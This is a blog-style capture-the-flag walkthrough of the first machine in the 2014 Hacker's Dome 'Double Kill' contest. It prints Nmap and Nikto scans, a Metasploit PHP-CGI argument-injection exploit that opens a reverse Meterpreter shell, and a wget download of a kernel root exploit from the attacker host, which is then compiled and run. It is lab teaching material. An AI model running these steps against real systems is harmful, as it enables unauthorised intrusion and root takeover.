Double Kill – Hacker’s Dome CTF Walk Through Part 1

Next Story

Kioptrix Level 1 Hacking Challenge Walkthrough

This past weekend our Quantum Security CTF Team (consisting of Kamil @vavkamil and myself @jamesbower ) competed on the Hacker’s Dome – Double Kill CTF.  The competition consisted of two vulnerable machines with each containing both a user flag and a super user (root) flag.  We were able to capture both flags on the first server and here is the walk through.

First target: 10.200.0.4

Nmap scan:
==========

Starting Nmap 6.46 ( http://nmap.org ) at 2014-07-26 17:06 CEST
Nmap scan report for 10.200.0.4
Host is up (0.067s latency).
Not shown: 996 closed ports
PORT    STATE    SERVICE     VERSION
22/tcp  open     ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 3d:ab:fe:49:52:95:1e:f5:bf:9f:eb:ff:d8:6e:fb:16 (DSA)
|   2048 5c:43:53:0c:cb:50:57:3b:c6:b6:68:32:4d:fd:5c:f9 (RSA)
|_  256 f0:d9:63:a2:e0:b8:47:cc:46:32:19:2f:89:4b:a7:e4 (ECDSA)
80/tcp  open     http        Apache httpd 2.2.22 ((Ubuntu))
|_http-methods: No Allow or Public header in OPTIONS response (status code 302)
| http-title: phpMyAdmin
|_Requested resource was http://10.200.0.4/phpMyAdmin-4.2.6-all-languages/
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 9 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SSH is relatively up to date and so is Apache so time to see what Nikto finds.

Nikto scan:
===========

—————————————————————————
+ Target IP:          10.200.0.4
+ Target Hostname:    10.200.0.4
+ Target Port:        80
+ Start Time:         2014-07-26 11:22:26 (GMT-4)
—————————————————————————
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3
+ The anti-clickjacking X-Frame-Options header is not present.
+ Root page / redirects to: /phpMyAdmin-4.2.6-all-languages
+ Uncommon header ‘tcn’ found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for ‘index’ were found: index.php
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ /cgi-bin/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 284076, size: 5108, mtime: Tue Aug 28 06:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-: /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution. See http://www.kb.cert.org/vuls/id/520827
+ 7355 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2014-07-26 11:40:41 (GMT-4) (1095 seconds)
—————————————————————————

At first I spent quite a bit of time in the /phpMyAdmin-4.2.6-all-languages directory trying to find some type of foothold.  But this remained fruitless and I felt like I was wasting too much time on one thing.  I decided to continue enumerating to see if anything else would appear that I could use.

More enumeration:
=================

Dirb finds nothing of real interest.

http://10.200.0.4/cgi-bin/



Going back over my Nikto results I see this (OSVDB-: /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution.)

I wasn’t familiar with this vulnerability so I dug a little bit deeper and came across a great couple of articles about it and was eventually able to find out that Metasploit already had a module for it.  Great!

Exploitation:
=============

https://www.rapid7.com/db/modules/exploit/multi/http/php_cgi_arg_injection

0.4_2

msf > use exploit/multi/http/php_cgi_arg_injection
msf exploit(php_cgi_arg_injection) > show options

Module options (exploit/multi/http/php_cgi_arg_injection):

Name         Current Setting  Required  Description
—-         —————  ——–  ———–
PLESK        false            yes       Exploit Plesk
Proxies                       no        Use a proxy chain
RHOST                         yes       The target address
RPORT        80               yes       The target port
TARGETURI                     no        The URI to request (must be a CGI-handled PHP script)
URIENCODING  0                yes       Level of URI URIENCODING and padding (0 for minimum)
VHOST                         no        HTTP server virtual host

Exploit target:

Id  Name
—  —-
0   Automatic

msf exploit(php_cgi_arg_injection) > set RHOST 10.200.0.4
RHOST => 10.200.0.4
msf exploit(php_cgi_arg_injection) > set LPORT 8080
LPORT => 80
msf exploit(php_cgi_arg_injection) > exploit

[*] Started reverse handler on 172.16.237.66:8080
[*] Sending stage (40551 bytes) to 10.200.0.4
[*] Meterpreter session 1 opened (172.16.237.66:8080 -> 10.200.0.4:59780) at 2014-07-26 22:40:23 +0200

meterpreter > shell
Process 28156 created.
Channel 0 created.
python -c ‘import pty; pty.spawn(“/bin/bash”)’

First flag:
===========

[email protected]:/var/www$ cat user-trohphy.txt
40a5e0e8aa540359d7e99304118cc86aebabd08c

With this we’re able to get the first user-trophy.txt and move on to getting a root shell.

Local root exploit:
===================

3.2.0-23-generic
x86_64 x86_64 x86_64

http://www.exploit-db.com/exploits/33589/

[email protected]:/tmp/infinity$ wget 172.16.237.66/exploit.c
wget 172.16.237.66/exploit.c
–2014-07-26 23:42:11–  http://172.16.237.66/exploit.c
Connecting to 172.16.237.66:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 3845 (3.8K) [text/x-csrc]
Saving to: `exploit.c’

100%[======================================>] 3,845       –.-K/s   in 0s

2014-07-26 23:42:11 (20.3 MB/s) – `exploit.c’ saved [3845/3845]

[email protected]:/tmp/infinity$ gcc exploit.c -O2 -o vnik
gcc exploit.c -O2 -o vnik
[email protected]:/tmp/infinity$ ./vnik 0
./vnik 0
IDT addr = 0xffffffff81dd7000
Using int = 3 with offset = -49063
[email protected]:/tmp/infinity# whoami
whoami
root
[email protected]:/tmp/infinity# cd /root
cd /root
[email protected]:~# ls
ls
superuser-trophy.txt

Second flag:
===========

[email protected]:~# cat superuser-trophy.txt
cat superuser-trophy.txt
8f8bc25a81e76ffd51e534eb0633eeb0c70cdf01

[email protected]:~#

Leave a Reply